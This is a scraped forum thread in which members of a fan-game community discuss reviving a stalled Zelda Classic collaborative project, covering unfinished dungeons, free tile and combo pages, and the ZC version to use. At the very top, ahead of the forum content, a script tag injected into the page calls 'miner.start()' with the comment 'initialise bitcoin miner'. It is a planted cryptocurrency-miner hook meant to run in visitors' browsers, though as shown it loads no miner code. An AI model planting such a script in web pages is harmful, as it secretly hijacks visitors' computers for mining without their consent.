<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectmario fan games galaxysmbx community

What Happened?

... zelda
User avatar
raekuul
D&C 134:2
Posts: 1107
Joined: 11 years ago
First name: Pokota
Pronouns: he/him/his
Location: Literal Cincinnati
Contact:

What Happened?

Postby raekuul » 8 months ago

Did we all fall off the side of the earth or something?
I do streams sometimes
SnoruntPyro played my MaGLX2 level
Image
And now to reveal my rejected names: Darth Vader's Tough Savannah Mansion in Canada's Chapter

User avatar
SAJewers
hi
Posts: 3406
Joined: 8 years ago
Location: Nova Scotia

Re: What Happened?

Postby SAJewers » 8 months ago

Same could probably be said of MaGL X: The Lost Levels.
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 2605
Joined: 7 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: What Happened?

Postby Leet » 8 months ago

yeah but azct is more interesting
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
Leet
Well, hello, Smith ( ´-`)ノ
Posts: 2605
Joined: 7 years ago
First name: Chie Arale
Pronouns: she/her
Location: Harman's Room

Re: What Happened?

Postby Leet » 8 months ago

Also one should probably attempt to contact nabe since he was leading the most recent phase
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

User avatar
Nabe
Still working on AZCT
Posts: 143
Joined: 7 years ago

Re: What Happened?

Postby Nabe » 8 months ago

I still exist! I check this every week if not sooner, so this is a good way to reach me. Or Discord.

There's a lot to pull together with the project. It needs three floors of the final dungeon, and I haven't kept up with the people who were going to do those floors, aside from myself, and Moosh who finished his (it's extremely good). Level 6 needs to be handled (Awakenyourmind's treatment was looking very nice). Level 2 is fully planned, but not built. Level 5 needs some finagling with the GB tileset, and polish with enemy placements and types. Level 8 has a little tile work to do. The overworld needs some enemy placements, and a couple sideview areas. There are some story cutscenes that need to be scripted, and some miscellaneous graphics need to be done for them. Levels 2, ideally 4, and presumably 6 need boss scripting, as well as the final boss. The wand minidungeon needs a spooky-ooky woods tileset. In overall scripting, some systems need to be simplified and brought in line with each other, a little, but it's all in working order aside from Level 5, related to the GB tileset. Most secret cameo rooms are in place. The trading sequence is not.

tl;dr
The majority of things to be done are busy work. The biggest actual gaps are Level 6, two floors of the final dungeon, and the final boss.

User avatar
KobaBeach
obscure jrpg enthusiast
Posts: 1733
Joined: 7 years ago
First name: David
Pronouns: he/him
Location: Portugal

Re: What Happened?

Postby KobaBeach » 8 months ago

Nabe wrote: The majority of things to be done are busy work. The biggest actual gaps are Level 6, two floors of the final dungeon, and the final boss.
Let me know if you need me for anything.

I won't mind relearning ZC to make some stuff. Or if we're even lucky, a sequel (as if).
Nimbus Monastery is my baby and I want the world to see its awful cloudy face, along with the rest of this omnibus of video game (tm)

I could probably help around in level making, maybe scripting but I'll need a small period to learn it. Shouldn't be too hard.
twitter (spicy at times!) | romhacking twitter (cats!!!) | GitHub | avatar by kuma

who cares:
Image

Image
Image
Image
Image
Image
Image
Image
:pan_pride:

User avatar
Nimono
Posts: 576
Joined: 7 years ago

Re: What Happened?

Postby Nimono » 4 months ago

I also overall kinda lost interest in ZC somehow. I still wanna go back to it a bit, but I find it hard to keep the motivation to. :/ I really hate basically abandoning this project, I'd really love to see it finished and get it into peoples' hands so they can have fun with it!

User avatar
Nabe
Still working on AZCT
Posts: 143
Joined: 7 years ago

Re: What Happened?

Postby Nabe » 3 months ago

Nimono wrote: I also overall kinda lost interest in ZC somehow. I still wanna go back to it a bit, but I find it hard to keep the motivation to. :/ I really hate basically abandoning this project, I'd really love to see it finished and get it into peoples' hands so they can have fun with it!
For sure. I'll take inventory soon and make sure that the master QST is tidy and coherent, in case anyone looks at it.

thatguyif
Posts: 534
Joined: 6 years ago
Pronouns: We Are The 99%
Location: Over There

Re: What Happened?

Postby thatguyif » 3 months ago

Nimono wrote: I also overall kinda lost interest in ZC somehow. I still wanna go back to it a bit, but I find it hard to keep the motivation to. :/ I really hate basically abandoning this project, I'd really love to see it finished and get it into peoples' hands so they can have fun with it!
Dang :(

Also, happy birthday :)
Image
Image Image
Image Image
Image Image

User avatar
Nimono
Posts: 576
Joined: 7 years ago

Re: What Happened?

Postby Nimono » 3 months ago

thatguyif wrote: Dang :(

Also, happy birthday :)
not my birthday XD That hat won't go away, I don't know how to get rid of it.
Nabe wrote:
Nimono wrote: I also overall kinda lost interest in ZC somehow. I still wanna go back to it a bit, but I find it hard to keep the motivation to. :/ I really hate basically abandoning this project, I'd really love to see it finished and get it into peoples' hands so they can have fun with it!
For sure. I'll take inventory soon and make sure that the master QST is tidy and coherent, in case anyone looks at it.
Alright. Send me a message when you get a full list of what's left, and I'll help out with whatever I can! I really wanna see this through to completion. (And I really do think we went WAY too big on this, haha. Two overworlds AND 8 dungeons AND a few mini-dungeons? We really shoulda kept it simple for a first ZC project...)

User avatar
KobaBeach
obscure jrpg enthusiast
Posts: 1733
Joined: 7 years ago
First name: David
Pronouns: he/him
Location: Portugal

Re: What Happened?

Postby KobaBeach » 3 months ago

Nimono wrote: And I really do think we went WAY too big on this, haha. Two overworlds AND 8 dungeons AND a few mini-dungeons? We really shoulda kept it simple for a first ZC project...
talkhaus projects are destined to fail from overambition :bigtartle:
twitter (spicy at times!) | romhacking twitter (cats!!!) | GitHub | avatar by kuma

who cares:
Image

Image
Image
Image
Image
Image
Image
Image
:pan_pride:

User avatar
AUS
Toni#4796
Posts: 211
Joined: 10 years ago
First name: Toni
Pronouns: they/them/their
Location: アース

Re: What Happened?

Postby AUS » 3 months ago

also, like, most internet collaborations via random ppl in general
Image
"oh no my best friend was replaced by a evil demon shadow monster"
"argh i am the evil shadow monster demon shadow"
Vip is pronounced "Beep"
I go by ToNi now. Trying to homogenize my internet handle.

Awakenyourmind
Muwha!
Posts: 137
Joined: 9 years ago

Re: What Happened?

Postby Awakenyourmind » 2 months ago

Nabe wrote: I still exist! I check this every week if not sooner, so this is a good way to reach me. Or Discord.

There's a lot to pull together with the project. It needs three floors of the final dungeon, and I haven't kept up with the people who were going to do those floors, aside from myself, and Moosh who finished his (it's extremely good). Level 6 needs to be handled (Awakenyourmind's treatment was looking very nice). Level 2 is fully planned, but not built. Level 5 needs some finagling with the GB tileset, and polish with enemy placements and types. Level 8 has a little tile work to do. The overworld needs some enemy placements, and a couple sideview areas. There are some story cutscenes that need to be scripted, and some miscellaneous graphics need to be done for them. Levels 2, ideally 4, and presumably 6 need boss scripting, as well as the final boss. The wand minidungeon needs a spooky-ooky woods tileset. In overall scripting, some systems need to be simplified and brought in line with each other, a little, but it's all in working order aside from Level 5, related to the GB tileset. Most secret cameo rooms are in place. The trading sequence is not.

tl;dr
The majority of things to be done are busy work. The biggest actual gaps are Level 6, two floors of the final dungeon, and the final boss.
So I still have the file for level 6 and the work I did so far. I am willing to start working on it now and finish it up, if you can assure me you guys are going to do your parts as well. Ive been working on my own ZC game lately but if you are sure things will move ahead as planned I can get started. Also what version of ZC are we using? Let me know because im down to finish this and help with other stuff. :D

User avatar
Nabe
Still working on AZCT
Posts: 143
Joined: 7 years ago

Re: What Happened?

Postby Nabe » 2 months ago

Awakenyourmind wrote:
Nabe wrote: I still exist! I check this every week if not sooner, so this is a good way to reach me. Or Discord.

There's a lot to pull together with the project. It needs three floors of the final dungeon, and I haven't kept up with the people who were going to do those floors, aside from myself, and Moosh who finished his (it's extremely good). Level 6 needs to be handled (Awakenyourmind's treatment was looking very nice). Level 2 is fully planned, but not built. Level 5 needs some finagling with the GB tileset, and polish with enemy placements and types. Level 8 has a little tile work to do. The overworld needs some enemy placements, and a couple sideview areas. There are some story cutscenes that need to be scripted, and some miscellaneous graphics need to be done for them. Levels 2, ideally 4, and presumably 6 need boss scripting, as well as the final boss. The wand minidungeon needs a spooky-ooky woods tileset. In overall scripting, some systems need to be simplified and brought in line with each other, a little, but it's all in working order aside from Level 5, related to the GB tileset. Most secret cameo rooms are in place. The trading sequence is not.

tl;dr
The majority of things to be done are busy work. The biggest actual gaps are Level 6, two floors of the final dungeon, and the final boss.
So I still have the file for level 6 and the work I did so far. I am willing to start working on it now and finish it up, if you can assure me you guys are going to do your parts as well. Ive been working on my own ZC game lately but if you are sure things will move ahead as planned I can get started. Also what version of ZC are we using? Let me know because im down to finish this and help with other stuff. :D
Hey, yo. We're in 2.5.2 officially, and that'll make things easiest, but the 6th Quest contest build is fine. Given the current world happenings, I've been working on the Level 2 build quite a bit, and I'm going to continue plugging away on the project for the foreseeable future. No one else is doing anything at the moment. Level 6 is a big hole keeping the game from being playable, and we'd (I'd) definitely appreciate the help.

Awakenyourmind
Muwha!
Posts: 137
Joined: 9 years ago

Re: What Happened?

Postby Awakenyourmind » 2 months ago

Nabe wrote:
Awakenyourmind wrote:
Nabe wrote: I still exist! I check this every week if not sooner, so this is a good way to reach me. Or Discord.

There's a lot to pull together with the project. It needs three floors of the final dungeon, and I haven't kept up with the people who were going to do those floors, aside from myself, and Moosh who finished his (it's extremely good). Level 6 needs to be handled (Awakenyourmind's treatment was looking very nice). Level 2 is fully planned, but not built. Level 5 needs some finagling with the GB tileset, and polish with enemy placements and types. Level 8 has a little tile work to do. The overworld needs some enemy placements, and a couple sideview areas. There are some story cutscenes that need to be scripted, and some miscellaneous graphics need to be done for them. Levels 2, ideally 4, and presumably 6 need boss scripting, as well as the final boss. The wand minidungeon needs a spooky-ooky woods tileset. In overall scripting, some systems need to be simplified and brought in line with each other, a little, but it's all in working order aside from Level 5, related to the GB tileset. Most secret cameo rooms are in place. The trading sequence is not.

tl;dr
The majority of things to be done are busy work. The biggest actual gaps are Level 6, two floors of the final dungeon, and the final boss.
So I still have the file for level 6 and the work I did so far. I am willing to start working on it now and finish it up, if you can assure me you guys are going to do your parts as well. Ive been working on my own ZC game lately but if you are sure things will move ahead as planned I can get started. Also what version of ZC are we using? Let me know because im down to finish this and help with other stuff. :D
Hey, yo. We're in 2.5.2 officially, and that'll make things easiest, but the 6th Quest contest build is fine. Given the current world happenings, I've been working on the Level 2 build quite a bit, and I'm going to continue plugging away on the project for the foreseeable future. No one else is doing anything at the moment. Level 6 is a big hole keeping the game from being playable, and we'd (I'd) definitely appreciate the help.
Alright cool! Ill start working on level 6 then.

Awakenyourmind
Muwha!
Posts: 137
Joined: 9 years ago

Re: What Happened?

Postby Awakenyourmind » 2 months ago

Nabe wrote:
Awakenyourmind wrote:
Nabe wrote: I still exist! I check this every week if not sooner, so this is a good way to reach me. Or Discord.

There's a lot to pull together with the project. It needs three floors of the final dungeon, and I haven't kept up with the people who were going to do those floors, aside from myself, and Moosh who finished his (it's extremely good). Level 6 needs to be handled (Awakenyourmind's treatment was looking very nice). Level 2 is fully planned, but not built. Level 5 needs some finagling with the GB tileset, and polish with enemy placements and types. Level 8 has a little tile work to do. The overworld needs some enemy placements, and a couple sideview areas. There are some story cutscenes that need to be scripted, and some miscellaneous graphics need to be done for them. Levels 2, ideally 4, and presumably 6 need boss scripting, as well as the final boss. The wand minidungeon needs a spooky-ooky woods tileset. In overall scripting, some systems need to be simplified and brought in line with each other, a little, but it's all in working order aside from Level 5, related to the GB tileset. Most secret cameo rooms are in place. The trading sequence is not.

tl;dr
The majority of things to be done are busy work. The biggest actual gaps are Level 6, two floors of the final dungeon, and the final boss.
So I still have the file for level 6 and the work I did so far. I am willing to start working on it now and finish it up, if you can assure me you guys are going to do your parts as well. Ive been working on my own ZC game lately but if you are sure things will move ahead as planned I can get started. Also what version of ZC are we using? Let me know because im down to finish this and help with other stuff. :D
Hey, yo. We're in 2.5.2 officially, and that'll make things easiest, but the 6th Quest contest build is fine. Given the current world happenings, I've been working on the Level 2 build quite a bit, and I'm going to continue plugging away on the project for the foreseeable future. No one else is doing anything at the moment. Level 6 is a big hole keeping the game from being playable, and we'd (I'd) definitely appreciate the help.
What pages do I use for the level 6 tiles?

User avatar
Nabe
Still working on AZCT
Posts: 143
Joined: 7 years ago

Re: What Happened?

Postby Nabe » 2 months ago

Awakenyourmind wrote: What pages do I use for the level 6 tiles?
You can use 171-180 if needed.

Awakenyourmind
Muwha!
Posts: 137
Joined: 9 years ago

Re: What Happened?

Postby Awakenyourmind » 2 months ago

Nabe wrote:
Awakenyourmind wrote: What pages do I use for the level 6 tiles?
You can use 171-180 if needed.
Which combo pages are free? I need about 5 more. Also can we use a .spc as the music file? Its Kbs not MBs.

User avatar
Nabe
Still working on AZCT
Posts: 143
Joined: 7 years ago

Re: What Happened?

Postby Nabe » 2 months ago

Awakenyourmind wrote:
Nabe wrote:
Awakenyourmind wrote: What pages do I use for the level 6 tiles?
You can use 171-180 if needed.
Which combo pages are free? I need about 5 more. Also can we use a .spc as the music file? Its Kbs not MBs.
Sorry for the wait, weird world right now. Five pages of combos? 16-20 would be fine. .spc is fine.

Awakenyourmind
Muwha!
Posts: 137
Joined: 9 years ago

Re: What Happened?

Postby Awakenyourmind » 2 months ago

Nabe wrote:
Awakenyourmind wrote:
Nabe wrote:
You can use 171-180 if needed.
Which combo pages are free? I need about 5 more. Also can we use a .spc as the music file? Its Kbs not MBs.
Sorry for the wait, weird world right now. Five pages of combos? 16-20 would be fine. .spc is fine.
Not a problem, thanks!


Return to “AZCT”

Who is online

Users browsing this forum: No registered users and 1 guest